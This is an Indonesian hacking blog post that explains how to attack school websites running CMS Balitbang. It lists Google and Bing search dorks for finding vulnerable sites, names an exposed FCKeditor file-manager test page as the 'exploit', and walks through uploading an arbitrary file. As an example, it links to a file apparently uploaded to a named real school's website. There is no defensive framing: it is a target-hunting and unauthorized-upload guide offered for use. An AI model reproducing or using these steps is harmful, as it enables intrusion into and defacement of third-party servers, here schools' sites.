HSS Cyber Crew- Sedikit membahas tentang CMS Balitbang, CMS Balitbang adalah salah satu
CMS ( Content Management System ) yang sudah siap pakai dan biasanya
dipergunakan untuk web sekolah. CMS ini dikembangkan oleh Balitbang
Kemendiknas Indonesia.
Dork in google..
1. inurl:"/html/index.php" intext:"Tim Balitbang"
2. inurl:"/html/index.php" intitle:"Selamat Datang"
3. inurl:"/member/" intext:"Tim Balitbang"
Dork in bing..
1. IP:[target-IP] /html/
2. IP:[target-IP] sch.id
3. IP:[target-IP] ac.id
4. IP:[target-IP] blablablaa…
Exploit : /editor/filemanager/connectors/test.html
1). Masukan salah satu dork diatas untuk mencari bug pada CMS Balitbang
2). Kemudian pilih salah satu website dari hasil pencarian menggunakan dork tersebut
3). Tampilan awal web target.
4). Setelah itu kita masukan exploit untuk CMS Balitbang pada url target di addressbar lalu tekan Enter.maka keluar seperti ini. Berikut SS nya
7). Klik Upload Jika Sukses Maka Keluar Pop Up Seperti Berikut SS nya
8).Untuk Melihat Hasil Nya Ketik http://target.com/userfiles/file/Nama_File.txt
Contoh http://www.sman1kotabaru.sch.id/userfiles/file/MCyber.txt maka Keluar Seperti Dibawah ini :v
0 komentar:
Posting Komentar